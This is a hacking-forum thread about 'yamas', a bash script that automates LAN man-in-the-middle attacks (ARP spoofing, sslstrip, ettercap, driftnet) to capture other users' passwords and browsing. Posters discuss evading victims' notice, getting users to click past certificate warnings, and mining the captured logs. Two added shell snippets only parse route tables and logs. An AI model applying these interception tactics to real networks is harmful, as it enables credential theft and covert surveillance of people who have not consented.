192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.102

root@bt:~# ip route show | awk '(NR == 1) { print $1}'
default

Therefore the value "default" is passed to nmap, stopping the script. Not sure if other people have this problem, but the fix for me is to change line 332 to:


search=$(ip route show | awk '(NR == 2) { print $1}')

Regards
Vulpi
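The same fix, made independent of the line order so that neither "NR == 1" nor "NR == 2" has to be guessed per release. This is an added example, not yamas code; the function names are hypothetical and the routing tables are constructed samples.

```shell
#!/bin/sh
# Added example, not yamas code: find the on-link IPv4 network of an
# interface from `ip route show` output without depending on line order.
# BT5 and BT5r1 print the "default via ..." and "a.b.c.d/nn dev ..." lines
# in a different order, which is what broke a fixed 'NR == 1' or 'NR == 2'.

# local_subnet IFACE   (reads `ip route show` output on stdin)
# Prints the CIDR of the directly connected network on IFACE, or prints
# nothing and returns 1 when there is none, so the caller can stop instead
# of handing nmap the word "default".
local_subnet() {
    subnet=$(awk -v dev="$1" '
        # keep the line whose first field looks like a.b.c.d/nn, that is
        # bound to the requested interface and is an on-link route
        $1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+\/[0-9]+$/ &&
        $2 == "dev" && $3 == dev && /scope link/ { print $1; exit }')
    [ -n "$subnet" ] || return 1
    printf '%s\n' "$subnet"
}

# subnet_from_sample ROUTES IFACE: run local_subnet on a saved routing table
subnet_from_sample() {
    printf '%s\n' "$1" | local_subnet "$2"
}

# Constructed samples, not real captures: the two orderings seen in the
# thread, plus a host with two interfaces.
ROUTES_DEFAULT_FIRST='default via 192.168.0.254 dev wlan0
192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.102'

ROUTES_SUBNET_FIRST='192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.102
default via 192.168.0.254 dev wlan0'

ROUTES_TWO_IFACES='default via 10.0.0.1 dev eth0
10.0.0.0/8 dev eth0 proto kernel scope link src 10.1.2.3
192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.102'

# Demo: every sample yields 192.168.0.0/24 for wlan0; a missing interface
# is reported instead of a bogus value being passed on to nmap.
for sample in "$ROUTES_DEFAULT_FIRST" "$ROUTES_SUBNET_FIRST" "$ROUTES_TWO_IFACES"; do
    if net=$(subnet_from_sample "$sample" wlan0); then
        echo "wlan0 network: $net"
    else
        echo "no on-link network found for wlan0" >&2
    fi
done
```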

comaX
09-11-2011, 05:37 AM
Please do ! Regarding security issues, I'm the only one uploading anything, and anyone's free to look at the code before executing it. And I have no interest whatsoever in modifying the code to do some 3v17 haXXor stuff. Yet, I understand your concern ! If I could use some repo I would, but I never bothered trying to be honest... That could be very nice though. About making the code clearer, be my guest ! I've been meaning to do that for a while, but I keep running out of time, or adding new stuff and thinking I'll clean later, when I believe I won't add anything else.

For instance, the whole part concerning sslstrip may now be useless. I just put that regarding migration to BT5, but now it has been a while and I don't think it's necessary anymore.

Don't hesitate to mail, I'd be glad to work on it with you !

ShadowMaster
09-20-2011, 12:00 AM
First, amazing script, really cool. Second, when I ran it with arpspoof, the captured password was missing a letter. When I ran it with ettercap, the captured password was fine. Is this an issue with the realtime parsing? Just curious. Also, is there any way to have the script use ettercap's fake ssl and padlock option as opposed to sslstrip?

comaX
09-20-2011, 09:17 AM
That missing letter stuff never happened to me, maybe you made a typo while testing ?
As for the script using fake ssl, why not ! I'll dig into that and see what I can do, if I like it ;)

ShadowMaster
09-20-2011, 12:03 PM
That missing letter stuff never happened to me, maybe you made a typo while testing ?
As for the script using fake ssl, why not ! I'll dig into that and see what I can do, if I like it ;)
Um, as I logged in to the account, not sure how I could have made a typo... not important, I'll troubleshoot it again. As for the fake ssl, what I imagine is the user typing in 'yamas' and being presented with the same options as before, just instead of automatically defaulting to arpspoof, he chooses between arpspoof and ettercap, with the default being arpspoof. And if he chooses ettercap, let him choose if he wants to add both the Fake SSL option and the Fake padlock option. Thanks. Looking forward to a great update to an already great script.

destro23
10-07-2011, 01:39 PM
Hi comaX,

You might be pleased to know there is someone out here using your script to learn bash. The heavy commenting is very helpful.

I notice a small problem running nmap. On my set-up, I get these results:


root@bt:~# ip route show
default via 192.168.0.254 dev wlan0
192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.102

root@bt:~# ip route show | awk '(NR == 1) { print $1}'
default

Therefore the value "default" is passed to nmap, stopping the script. Not sure if other people have this problem, but the fix for me is to change line 332 to:


search=$(ip route show | awk '(NR == 2) { print $1}')

Regards
Vulpi


What kernel are you running? Type "uname -a", that may have something to do with it.

With .38 and .39 I think it gives a different format... maybe that's why. I remember trying the same command on 2 different VMs, BT5 and BT5R1, and they were a little different. Looks like comaX is running .39

comaX
10-07-2011, 08:53 PM
^ Yup, always up to date fellas !
The lines were inverted between BT5 and BT5r1.

JUUJUU
10-27-2011, 02:40 PM
Great script comaX. I use it on BT 5r1 and it works perfectly.
I have a few questions. Has anybody (or you) tried it on a LAN network? And how to edit the log file yamas.txt so it can see only pages visited while sniffing?

comaX
10-27-2011, 05:07 PM
Hmm, by definition, you run it on a lan network... Did you mean WAN ? (in that case, that's a no-go)

And I didn't get that part
how to edit log file yamas.txt so it can see only pages visited with while sniffing?
What did you mean ?

Thanks for your interest !

JUUJUU
10-27-2011, 06:24 PM
I mean on a local area network like in a school, office building... (more than 10 computers connected in a LAN).
After sniffing, the script asks if I want to keep the whole log file for further use. Well, how can I use that file further? For example I want to see only the pages visited, not all the other lines like "server header" and blah blah bb....

comaX
10-28-2011, 12:20 PM
It will work on any LAN network, be it home, professional or highschool. But if you're not authorized to do so, don't do it, it's illegal and I won't be responsible for whatever it is that you do.

"for further use" means that my script will only show you credentials, but there is a lot of stuff in the logs that could be useful... It's up to you to know what you want, and what can be found.

And yes you will have a lot of junk in those files, but with a little experience, you'll easily browse through it.

comr4de
11-02-2011, 11:20 PM
I just watched the youtube, this looks like a really nice auto script
I really enjoyed the youtube video
==
I have a problem running it
I am using BT5r1 and I installed yamas successfully
I ran it with the default inputs
BTW, I am on a mikrotik LAN
Every time I ran it I got this error message in the passwords console

" egrep: invalid back reference "

And that's not it, immediately after I got that error, I got disconnected from the mikrotik server and I have been asked to login to MT again

any ideas ?

JUUJUU
11-04-2011, 01:15 PM
It will work on any LAN network, be it home, professional or highschool. But if you're not authorized to do so, don't do it, it's illegal and I won't be responsible for whatever it is that you do.

"for further use" means that my script will only show you credentials, but there is a lot of stuff in the logs that could be useful... It's up to you to know what you want, and what can be found.

And yes you will have a lot of junk in those files, but with a little experience, you'll easily browse through it.

Ok, thanks for the fast reply. Don't worry, it won't be used in any illegal activity :cool:

AnimusDomini
11-21-2011, 04:49 PM
Hello comaX,

First of all, thanks for sharing your script... I was testing it and noticed the victims can't play youtube while the script is running. I tested with Chrome and Safari with the same results. The videos seem to be loading but don't load and so don't play. The script works great, but the stealth factor starts to fail when the victims guess something is weird. Is there a fix for it? Thanks in advance.

khaos
11-23-2011, 05:50 PM
Nice script. It works in my BT5R1 KDE 32 like a charm. I have some problems with ssl, because I can't get passwords from SSL sites.
Maybe it's my problem, I don't know. The settings seem to be ok

@JUUJUU: If you want to see what sites the clients visit try: urlsnarf -i wlan0 (In wlan0 enter your interface, e.g. eth0, wlan0, wlan1 etc)

ShadowMaster
11-23-2011, 06:49 PM
Nice script. It works in my BT5R1 KDE 32 like a charm. I have some problems with ssl, because I can't get passwords from SSL sites.
Maybe it's my problem, I don't know. The settings seem to be ok
Are you sure you're not logging on in the test case in https://... If you are then being the MiTM won't help, because all traffic is encrypted anyway. You need to make sure SSlStrip is taking away the HTTPS and making it HTTP only. If it's not, then try using the ettercap option and spoofing the ssl connection. Although that might take some social engineering to work in the wild... If the options that I suggested to ComaX (Allowing user input for the decision of either fake ssl, sslstrip, padlock icon, fake certificate etc...) get put in place, then it'll be easier. But until then good luck.

comaX
11-24-2011, 11:29 AM
If the options that I suggested to ComaX (Allowing user input for the decision of either fake ssl, sslstrip, padlock icon, fake certificate etc...) get put in place
Damn, I forgot about those. Sorry.
It's been a while since I wrote anything new.
About the padlock icon, don't you think it's better to leave it the way it is ? Do you think some people might not want it ? If so, I will make that an option.
I'll try to work on the other stuff you mentioned too, if I have the time.

Cheers !

ShadowMaster
11-24-2011, 10:44 PM
I think that the initiation of the script should look like this
./yamas
(a)rpspoof or (e)ttercap?
if a then keep all the defaults the way they are

if e then
do you want to (s)trip the ssl connection or to s(p)oof it?
if s then keep defaults and do you want to add the (p)adlock icon in the users browser?

if p then
do you want to use a fake certificate or not?Y/n?

the flow of this will allow the user to define all his own options and still provide the functionality of the other options to those who want them. Let me know. Thanks. Still looking forward to the update. :D

ShadowMaster
11-24-2011, 10:45 PM
AHH double post sorry!! Screwed up browser on a slow computer....

comaX
11-25-2011, 07:01 PM
(a)rpspoof or (e)ttercap?
if a then keep all the defaults the way they are

if e then
do you want to (s)trip the ssl connection or to s(p)oof it?
if s then keep defaults and do you want to add the (p)adlock icon in the users browser?

if p then
do you want to use a fake certificate or not?Y/n?

the flow of this will allow the user to define all his own options and still provide the functionality of the other options to those who want them. Let me know. Thanks. Still looking forward to the update.

I'll leave the ettercap option as a parameter passed to the script, but I think I'll use this kind of menu, it's a good idea ! By the way, if you have an idea of how to script this, you can submit it to me and you'll get the proper credits ;)

My main problem is that I never much used ettercap for the ssl stuff because I think it's bad SE, but surely I understand why someone would want that, so it makes sense to add it.

Cheers

Btw, is it me or is the site going really slow those last couple of weeks ?

ShadowMaster
11-25-2011, 07:42 PM
I'll leave the ettercap option as a parameter passed to the script, but I think I'll use this kind of menu, it's a good idea ! By the way, if you have an idea of how to script this, you can submit it to me and you'll get the proper credits ;)

My main problem is that I never much used ettercap for the ssl stuff because I think it's bad SE, but surely I understand why someone would want that, so it makes sense to add it.

Cheers

Btw, is it me or is the site going really slow those last couple of weeks ?

It might be just the two of us, its been sluggish for me as well. :p

So. The "new" flow looks like this.
./yamas - same old, same old.
./yamas -e
Do you want.... (all the previous menu options.)

BTW, I'm not sure what you mean by Bad SE?
Any way, I've never really scripted anything in bash, but I've got years of experience with c and .net, so it might be ported. That being said, if I knew what I was doing in bash, I would write it like so:
All vars would be booleans

var=(strip or spoof?)
if strip then var1=(padlock?)
if var1 then
run command w/ padlock, exit function/loop
if not var1 then
run command w/o padlock, exit function/loop

if spoof then var1=(add cert?)
if var1 then
run command w/ cert, exit function/loop
if not var1 then
run command w/o cert, exit function/loop


This pseudocode could be ported to bash fairly easily, I just don't know how... But I leave that to the experts like you.:D
Let me know. Thanks.

comaX
11-25-2011, 09:14 PM
I wouldn't call myself an expert at all, but thanks ! I guess I'll have to do some reading on ettercap's functionalities.
By "bad SE", I mean that any decent browser these days would say "bad cert, don't go there", I can't imagine someone thinking "You know what browser ? F*ck you, imma going' there !"

I guess I still want to believe in humanity after all :p

EDIT :
I came across a MAJOR problem while working on this... Unless I understood something the wrong way, you either spoof the ssl connection with ettercap's fakessl (which includes fakecert), and you WILL have https etc, or you use sslstrip to get rid of the ssl.

But you can't do both at the same time.

So including fakessl would mean disable sslstrip, which will mean that the password parsing won't work, which pretty much defeats the whole goal of the script.

Correct me if I'm wrong !

Meanwhile, I'll keep digging.

EDIT :
@AnimusDomini
Hello comaX,

First of all, thanks for sharing your script... I was testing it and noticed the victims can't play youtube while the script is running. I tested with Chrome and Safari with the same results. The videos seems to be loading but doesn't load and so, doesn't play. The script works great, but the stealth factor starts to fail when the victims guess something is weird. Is there a fix for it? Thanks in advanced.

I believe it was posted retroactively... So, as I told you, I never experienced such a thing, but it would make sense if the videos were slow to load. I'll ask people to provide feedback in the "message of the day" in the script, hoping people actually read it ^^

khaos
11-27-2011, 12:42 AM
Are you sure you're not logging on in the test case in https://... If you are then being the MiTM won't help, because all traffic is encrypted anyway. You need to make sure SSlStrip is taking away the HTTPS and making it HTTP only. If it's not, then try using the ettercap option and spoofing the ssl connection. Although that might take some social engineering to work in the wild... If the options that I suggested to ComaX (Allowing user input for the decision of either fake ssl, sslstrip, padlock icon, fake certificate etc...) get put in place, then it'll be easier. But until then good luck.

Thanks for your reply but I didn't understand what you mean. I have run yamas and when I tried to login on my test pc ("victim") to gmail via https://gmail.com it doesn't strip the ssl.

Maybe I have not understood how sslstrip works. I think that sslstrip removes the ssl and the site will be http://gmail.com, not giving a fake ssl certificate to the victim (as cain and abel does). So what do I have wrong?

ShadowMaster
11-27-2011, 01:08 AM
@ComaX If the FakeSSL is active, all packets forwarded THROUGH you would be decrypted. Also, people clicking through the warnings happens way more often than is comforting.

@khaos What browser are you using? Some browsers (Chrome...) do not allow non-ssl connections to certain sites.

ShadowMaster
11-27-2011, 01:15 AM
Why has this site been so screwy lately? Mods please delete...

comaX
11-27-2011, 02:57 AM
Maybe I have not understood how sslstrip works. I think that sslstrip removes the ssl and the site will be http://gmail.com, not giving a fake ssl certificate to the victim (as cain and abel does). So what do I have wrong?

What did you type in to get to the site ?
If you typed https://... then sslstrip can't do anything. Now if you only typed "gmail.com", then refer to ShadowMaster's post : indeed chrome will kinda force you to the secured version.


If the FakeSSL is active, all packets forwarded THROUGH you would be decrypted. Also, people clicking through the warnings happens way more often than is comforting.
That's a damn shame for "standard users"... But anyway, it does mean that both sslstrip and ssl dissecting can't be run at the same time, right ? Again, I'm only assuming since I haven't had the chance to test it myself yet

ShadowMaster
11-27-2011, 03:16 AM
I don't know why you would want both to run at the same time. If you get all unencrypted traffic saved, why bother stripping? And even if for some reason you would want the two running, why would they not be able to run concurrently? SSlStrip will take gmail.com and return http. SSL spoofing will (should? maybe test this out?) take https gmail.com and, with the acceptance of the user, return all unencrypted traffic to you. The user still should see HTTPS gmail. Refer to the SE toolkit for similar attacks. The pentesting with metasploit book clearly shows a user with https getting all his traffic read.
Incidentally, on the other side of the fence, check this out. Any help would be greatly appreciated. http://www.backtrack-linux.org/forums/showthread.php?t=46564

blackRock
11-28-2011, 08:17 PM
In lines 413 & 422 you have hardcoded "wlan0".

Is it right?

comaX
11-29-2011, 08:01 AM
I'll check, but if it's the case, it surely is yet again another dev mistake, forgot to replace my interface by the variable... Thanks for reporting !

You were right, it's now fixed !

blackRock
11-29-2011, 03:18 PM
With script running, sites load much much slower. Is it "normal"?

Also, I can't login to drupal based sites (e.g. drupal.org), but I can login to Joomla ones. Does it have to do with sslstrip or something else?

khaos
11-29-2011, 09:54 PM
Hmm I used chrome. So Ok. But I have a question: If our victim goes directly to https://gmail.com (e.g. he types https://) and we set the rule in iptables to get 443-->port of sslstrip... can we sslstrip the victim? Because port 80 is only for HTTP requests. Why we use that port and not 443? Thanks

comaX
11-29-2011, 10:29 PM
Because a request to https is made through port 80 while in standard navigation. But if the request is made through port 443, it's already too late.
As the name sslstrip indicates, it strips the s from https.

I hope that answers the question, if not, tell and I'll try to be more precise.

khaos
11-30-2011, 02:53 PM
I understood. Thanks for the help. Do you know if the problems with ettercap+sslstrip are fixed?

comaX
11-30-2011, 03:42 PM
Yeahp, but you have to patch it or wait for a new release of ettercap. My buddy eric milam took up dev on it and released a patch to correct the bugs. He posted on the forums about it, give it a search ;)
(I'll edit if I remember the post)

comaX
01-27-2012, 07:42 AM
Hi everyone !

Following suggestions I just added Driftnet in Yamas. Nothing much you'll say, and I'll agree ; but since I had quite the number of requests for this and it was a very simple implementation... There it is. Next will be URLsnarf (even though I doubt that is really useful).

@ShadowMaster : how's the MITM protection going ?
I re-read your suggestions, and I really have to find a way to use FakeSSL... So, guys, anyone, a little help would be greatly appreciated !

I see this script is used less than it used to (around 50 times a day now), but I actually think this is great ; it means people actually use it on a regular basis. I hope not to play haxor though...

Cheers !

ShadowMaster
01-27-2012, 01:56 PM
@ShadowMaster : how's the MITM protection going ?
I re-read your suggestions, and I really have to find a way to use FakeSSL... So, guys, anyone, a little help would be greatly appreciated !


Hey comaX! The MiTM protection is going wonderfully. The two minutes a week I have to spend on it in between frantic, feverish h4x1ng in the PWB course really pay off. :p :cool:
I really am ridiculously busy with that course, hopefully, when I finish I'll devote more time to it. But thank you for the interest, it shows I'm not wasting my time.

I AM looking forward to the implementation of FakeSSL, and I noticed the implementation of the padlock favicon. One down, some to go. Thanks. Your script is a wonderful tool.

ShadowMaster
01-29-2012, 09:21 PM
Hey, comaX. Quick Question. I've been using more and more of your script recently and started experimenting with its features. I tried out driftnet, and noticed two problems. One: the window does not shut down with the rest of your script like the other terms. I know this is not a real problem, but since the rest of the script is so neat, I thought maybe you'd like to keep this the same way, and have it shut down also. Two: the pictures caught by driftnet are not saved anywhere, nor are we given the option to save them. Any thoughts on how to allow for saving those pics?

comaX
01-30-2012, 03:13 PM
Thanks for reporting ! I've already been told about driftnet not completely shutting down and I intend to fix this, but I haven't had much time lately. As for saving the pictures... Well, I don't know. I firstly put 2 options for driftnet but what I thought would not display images but save them all didn't work out, so I left it at the moment. I intend to dig the subject a little bit more so that it can be achieved though !

Thanks for the feedback, it's always appreciated :)

VulpiArgenti
01-31-2012, 07:46 AM
Hi ShadowMaster, The images are downloaded to /tmp, but driftnet deletes them when it closes. If you click on an image displayed in the xterm window, it will be saved to pwd (/). Or you could browse and sort /tmp before closing driftnet. ComaX, I'm sure this is why you let yamas leave driftnet open ;-)

comaX
02-01-2012, 03:06 PM
You dear sir might have a good point there. I'll check that. Worst-case scenario, I'll force kill with my hack-fu :p
No process ever shall resist my killing techniques !

I'll keep you guys posted !

Edit : well, well, well... I had put the driftnet killing in fast_cleanup() instead of cleanup()...
Now it's fixed, with a "greeting message" =D

By the way, if you find a way to save images, please do share.

TAPE
02-01-2012, 05:08 PM
Regarding saving the images, I had more success with 'tcpxtract', however am not
sure whether this is included in the stock BT5 ..

Might be an option to look into though.

ShadowMaster
02-01-2012, 07:37 PM
comaX, why not grep through the /tmp files and pull out drift-........ or whatever? copy them all into [pwd]/driftnet/ if the users says so? Like the other options...
Also, even though I love ascii art, maybe you should update the current header?.. :p :p

VulpiArgenti
02-02-2012, 03:39 AM
Xplico is worth a look too.

comaX
02-02-2012, 06:09 AM
Regarding saving the images, I had more success with 'tcpxtract', however am not
sure whether this is included in the stock BT5 ..

Might be an option to look into though.

It rings a bell, I'll see if it's included or not. Thanks for the suggestion !


comaX, why not grep through the /tmp files and pull out drift-........ or whatever? copy them all into [pwd]/driftnet/ if the users says so? Like the other options...
Also, even though I love ascii art, maybe you should update the current header?..

I thought about that... And was thinking that before "killall driftnet" I should add something like "cp /tmp/driftnet/* /anydir".
That should do the trick right ?
And it's funny you should mention the header, I feel like changing too !


Xplico is worth a look too.
I'll give it one then !

Thank you guys !

I'll probably push an update today :)

VulpiArgenti
02-02-2012, 07:30 AM
"cp /tmp/driftnet/* /anydir" Should be: cp /tmp/driftnet* /anydir

I know you'd have worked it out - thought I would save you the trouble :)

comaX
02-02-2012, 08:02 AM
It wasn't a mistake, I planned on saving temp files to /tmp/driftnet/ so I could just select everything in the folder. But you are right, since the names all begin with "driftnet", it's simpler your way, and it makes it useless to create another folder.

Since both are valid, I decided to use driftnet *and* tcpxtract (that is way better imho, segmentation faults apart). The user can choose !

I hardcoded the destination folder as /root/capture_$(date +%d%m%y). What do you think about that ?

I also changed the ASCII ;)

Edit : oh, by the way, Xplico doesn't seem to be present for me (xplico: command not found), so I didn't dig much...

Snayler
02-02-2012, 08:34 AM
AFAIK, Xplico needs to be installed first.

comaX
02-02-2012, 09:26 AM
It's in fact already installed under /opt/xplico/bin/xplico, but there are no symlinks for it. I however don't understand what it does nor what it should do... And there is no man entry for it. If someone could give me a little explanation, I'd be glad !
(Yeah I googled it... but a simple user-point-of-view and how it could be used would be nice ! )

Snayler
02-02-2012, 09:53 AM
It's in fact already installed under /opt/xplico/bin/xplico, but there are no symlinks for it. I however don't understand what it does nor what it should do... And there is no man entry for it. If someone could give me a little explanation, I'd be glad ! (Yeah I googled it... but a simple user-point-of-view and how it could be used would be nice ! ) Thanks for the pointer. Then it's a question of creating a symlink inside the /bin folder. From what I remember from 1/2 years ago (when I first/last used the app), it extracts data from a capture file (maybe also from a real-time capture, not sure). Data can be images, http contents, e-mails, sound files,...

ShadowMaster
02-02-2012, 10:39 AM
Xplico seems to be completely stand-alone. I'm not sure how you would allow for the automation that the rest of the script thrives on...

comaX
02-02-2012, 11:08 AM
Yeahp, from what I read on the internet about it, it's nice to have it to analyse further packets captures but I don't see how it would be relevant here. Anyway, it's always nice to have propositions of some tool.

What's your take on urlsnarf ? I don't quite see the point of having a list of GET HTTP blah blah www.mywebsite.com/folder/ressource.ext

Snayler
02-02-2012, 06:09 PM
What's your take on urlsnarf ? I don't quite see the point of having a list of GET HTTP blah blah www.mywebsite.com/folder/ressource.ext It's always interesting to demonstrate that an attacker can study your browsing habits and use that knowledge to exploit a computer/steal passwords (dns poisoning/phising/etc...).

VulpiArgenti
02-02-2012, 06:26 PM
Xplico is an interesting (and powerful) tool. It's best run on a dump (live capture mode is not as useful). It's easiest used through its web GUI so I agree wouldn't integrate well with yamas - just mentioned it while we were discussing image extraction.

comaX
02-02-2012, 06:50 PM
It's always interesting to demonstrate that an attacker can study your browsing habits and use that knowledge to exploit a computer/steal passwords (dns poisoning/phising/etc...).
I certainly agree with you but you'll find urlsnarf information in sslstrip's logs... So it doesn't bring anything new, imo.


Xplico is an interesting (and powerful) tool. It's best run on a dump (live capture mode is not as useful). It's easiest used through its web GUI so I agree wouldn't integrate well with yamas - just mentioned it while we were discussing image extraction.
All right, thanks, I thought you mentioned it for yamas, not as general knowledge. But it makes more sense this way and it sure seems to be a nice tool ! I'll try to have a go at it once I've figured out how to launch it :p

Snayler
02-02-2012, 07:50 PM
I certainly agree with you but you'll find urlsnarf informations in sslstrip's logs... So it doesn't bring anything new, imo. I'll be honest, I never looked inside a sslstrip log, so I don't know what's inside it. Have you compared the results from both tools, to check if they match?

comaX
02-03-2012, 05:16 AM
Sslstrip logs contain pretty much everything that happens on the network. You'll get a load of crap, headers, requests, etc. In urlsnarf, you only get the requests like GET. So, it's a little more readable than sslstrip logs, but to obtain the same result the parsing would be easy.
urlsnarf :

192.168.1.3 - - [23/Jul/2008:15:41:52 -0700] "GET http://suggestqueries.google.com/complete/search?output=firefox&client=firefox&hl=en-US&q=sguil HTTP/1.1" - - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1"

sslstrip

2011-11-17 15:27:50,528 Resolved host successfully: clients2.google.com -> 209.85.147.113
2011-11-17 15:27:50,529 Sending request via HTTP...
2011-11-17 15:27:50,573 HTTP connection made.
2011-11-17 15:27:50,573 Sending Request: GET /service/update2/crx?
2011-11-17 15:27:50,574 Sending header: accept-charset : windows-1252,utf-8;q=0.7,*;q=0.3
2011-11-17 15:27:50,574 Sending header: connection : keep-alive
2011-11-17 15:27:50,574 Sending header: accept-language : fr,en-US;q=0.8,en;q=0.6
2011-11-17 15:27:50,574 Sending header: host : clients2.google.com
2011-11-17 15:27:50,574 Sending header: user-agent : Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2

Ok, sslstrip logs are more verbose, but if you do something like cat sslstrip.log | grep "Resolved host successfully:", you should get the browsed websites...

Example on one of my logs with egrep -i -a -e "Resolved host successfully:" /root/sslstrip.log


2011-11-17 15:27:22,486 Resolved host successfully: safebrowsing.clients.google.com -> 173.194.67.101
2011-11-17 15:27:22,731 Resolved host successfully: safebrowsing-cache.google.com -> 209.85.227.139
2011-11-17 15:27:26,931 Resolved host successfully: whos.amung.us -> 67.202.94.93
2011-11-17 15:27:28,606 Resolved host successfully: www.facebook.com -> 69.171.242.14
2011-11-17 15:27:31,875 Resolved host successfully: 0-74.channel.facebook.com -> 66.220.145.41
2011-11-17 15:27:47,956 Resolved host successfully: whos.amung.us -> 67.202.94.93

And it wouldn't be too hard to keep only certain columns with awk or cut...
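The parsing sketched above, carried out for both quoted formats: each log is reduced to one hostname per line and the results are counted. This is an added example, not yamas code; the function names are hypothetical and the sample lines are constructed in the shape of the ones quoted in the thread.

```shell
#!/bin/sh
# Added example, not yamas code: reduce the two log formats quoted above
# (urlsnarf's CLF-style request lines and sslstrip's "Resolved host
# successfully:" lines) to one hostname per line, then count visits.
# Pure text processing; the sample lines below are constructed for the demo.

# hosts_from_sslstrip: stdin = sslstrip log
# Only "Resolved host successfully:" lines carry a hostname; it is the
# sixth whitespace-separated field. Header and request lines are dropped.
hosts_from_sslstrip() {
    awk '/Resolved host successfully:/ { print $6 }'
}

# hosts_from_urlsnarf: stdin = urlsnarf log
# The request ("GET http://host/path HTTP/1.1") is the first quoted field;
# take its URL, drop the scheme and everything from the first "/" or ":".
hosts_from_urlsnarf() {
    awk -F'"' '{
        n = split($2, req, " ")
        if (n < 2) next
        url = req[2]
        sub(/^https?:\/\//, "", url)
        sub(/[\/:].*$/, "", url)
        if (url != "") print url
    }'
}

# host_counts: stdin = hostnames, stdout = "COUNT HOST", busiest first
host_counts() {
    sort | uniq -c | sort -rn | awk '{ print $1, $2 }'
}

# Constructed samples: sslstrip lines in the shape shown in the thread,
# including non-matching lines that must be ignored.
SSLSTRIP_SAMPLE='2011-11-17 15:27:22,486 Resolved host successfully: safebrowsing.clients.google.com -> 173.194.67.101
2011-11-17 15:27:22,731 Resolved host successfully: safebrowsing-cache.google.com -> 209.85.227.139
2011-11-17 15:27:26,931 Resolved host successfully: whos.amung.us -> 67.202.94.93
2011-11-17 15:27:26,940 Sending request via HTTP...
2011-11-17 15:27:26,941 Sending header: host : whos.amung.us
2011-11-17 15:27:28,606 Resolved host successfully: www.facebook.com -> 69.171.242.14
2011-11-17 15:27:47,956 Resolved host successfully: whos.amung.us -> 67.202.94.93'

URLSNARF_SAMPLE='192.168.1.3 - - [23/Jul/2008:15:41:52 -0700] "GET http://suggestqueries.google.com/complete/search?output=firefox&q=sguil HTTP/1.1" - - "-" "Mozilla/5.0 (X11; U; Linux i686) Firefox/3.0.1"
192.168.1.3 - - [23/Jul/2008:15:42:01 -0700] "GET http://www.facebook.com:80/ HTTP/1.1" - - "-" "Mozilla/5.0 (X11; U; Linux i686) Firefox/3.0.1"'

# Demo: merge both sources into one visit count.
{ printf '%s\n' "$SSLSTRIP_SAMPLE" | hosts_from_sslstrip
  printf '%s\n' "$URLSNARF_SAMPLE" | hosts_from_urlsnarf; } | host_counts
```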

tuxnator
02-08-2012, 05:29 PM
Making Xplico run on BackTrack 5 is a real pain in the ass. When I wanted to try it, after losing some hours in vain, I just downloaded the VM from Xplico's website.

comaX
02-15-2012, 06:05 AM
Hi guys ! Quick post to tell you there were updates made ! It should be easier to run it on other linux platforms, and some stuff here and there.

As stated in the "message of the day" feature, I'm dropping urlsnarf since I didn't get much positive feedback about it.
With that said, if you guys really want something that'll show the browsed websites, I can do it just like I showed you two posts before this one. Tell me what you'd like !
Cheers !

ShadowMaster
02-15-2012, 01:07 PM
Hi guys ! Quick post to tell you there were updates made ! It should be easier to run it on other linux platforms, and some stuff here and there.

As stated in the "message of the day" feature, I'm dropping urlsnarf since I didn't get much positive feedback about it.
With that said, if you guys really want something that'll show the browsed websites, I can do it just like I showed you two posts before this one. Tell me what you'd like !
Cheers !
It may be a prob with my script, but when I run it like I always do, by typing yamas in the term, I get "No update available Script is installed", but the message of the day changes to the url snarf thing. I'm assuming that's not normal...
Also, you may want to add a -u feature in the script, because when I only want to update, not run it, I still have to go through the whole rigmarole of settings options, and cleaning up. -u would be so much more convenient. Thanks.

comaX
02-15-2012, 03:38 PM
Noted for the -u option, I'll work on that !
With that said, I myself have to update the same way you guys do. And when I just need to update it, I wait for the message to be displayed and then ctrl+c.
But yeah, an update option would be better :)
And yeahp, it's normal that the message of the day changes without an update. It's curled from my website on launch. You can deactivate that with the silent mode (-s).

ShadowMaster
02-15-2012, 03:43 PM
Noted for the -u option, I'll work on that !
With that said, I myself have to update the same way you guys do. And when I just need to update it, I wait for the message to be displayed and then ctrl+c.
But yeah, an update option would be better :)
And yeahp, it's normal that the message of the day changes without an update. It's curled from my website on launch. You can deactivate that with the silent mode (-s).
I get the message, that's fine. What I meant was: I got the NEW message, but NOT the NEW script...
Isn't it supposed to update?... I'm still using the last revision, and it says no update is available. feb 2.

comaX
02-16-2012, 05:15 AM
Ouch... I must have **** up somewhere along the way. I'll look into it, thanks for reporting !

ShadowMaster
02-16-2012, 10:31 AM
Of course I report. I love this tool, I want the newest version. :)
That being said, I'm not clear on the syntax to use fakessl. I see the option to add the favicon, I see the option to use ettercap, but where do I add in the fake ssl? Perhaps, if -e has been selected, you could make that one of the additional options. To use sslstrip for most, but for some websites/browsers, allow for fakessl?

comaX
02-16-2012, 01:53 PM
Ok, the update glitch should be fixed !
For the FakeSSL, I'm still trying to figure it out, and I don't have much time these days to do such "important" tests.
And since I need to do some searching and all, it's not for right now. But it'll come eventually ;)

Off-topic : there is this site hackershandbook.org that makes people pay to access "hacker knowledge", uses THE "Anonymous" identity to make money, and they seem to have included a part on yamas since I saw referral traffic from them. I blocked their users from seeing my site, but it's not enough.
Such a behaviour just makes me sick, so if you guys don't know what to do, they have a Facebook, a Twitter and an Android App (paying, of course...) that are just waiting for insults :) /Off-topic

ShadowMaster
02-16-2012, 01:59 PM
root@bt:~# yamas
No update available
Script is installed

run at 2:04 pm est....

I downloaded the script from your website and reinstalled. I'm now running version 20120212 instead of 20120202. I'm hoping that that is the latest version, because I still get no update available.

comaX
02-17-2012, 06:10 AM
Yup, it is !

wewe73
04-07-2012, 04:51 PM
hey comaX,

I used your script and I have to say it's more stable and effective than ettercap! Easy to download and install, and I got it working within minutes, unlike otherwise, where every time I fix something, something else comes up. So thank you very much for your script,

merci beaucoup :-)

ericmilam
04-08-2012, 02:54 AM
hey comaX,

